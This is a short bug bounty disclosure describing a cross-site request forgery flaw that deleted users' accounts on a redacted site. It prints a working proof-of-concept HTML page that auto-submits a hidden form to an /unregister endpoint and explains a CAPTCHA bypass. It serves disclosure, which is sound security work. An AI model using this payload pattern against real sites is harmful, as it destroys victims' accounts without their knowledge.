Cross-site request forgery vulnerability resulting in the deletion of a user's account.

One of the first cross-site request forgery vulnerabilities that I discovered on █████ allowed me to delete an unsuspecting user's account. In order to exploit this issue, I crafted a simple HTML form that sent a POST request to the `/unregister` endpoint when a user loaded the malicious page. ```html <body onload="document.csrfForm.submit()"> <form action="https://█████/unregister" method="POST" target="hiddenFrame" name="csrfForm"> <input type="hidden" name="unregister_submit" value="Delete my account" /> </form> <iframe name="hiddenFrame" style="display: none;"></iframe> </body> ``` The vendor awarded a bounty and subsequently resolved the issue — or so they thought — by adding a CAPTCHA. {F333810} The silly thing was, they did not even check to see if the CAPTCHA's result was correct. All you had to do was submit any arbitrary number and the cross-site request forgery vulnerability could still be exploited. {F333811} Until this day, I have absolutely no clue why the vendor decided to use a CAPTCHA to "fix" this issue. By the way, I was awarded a bounty for the bypass too. :P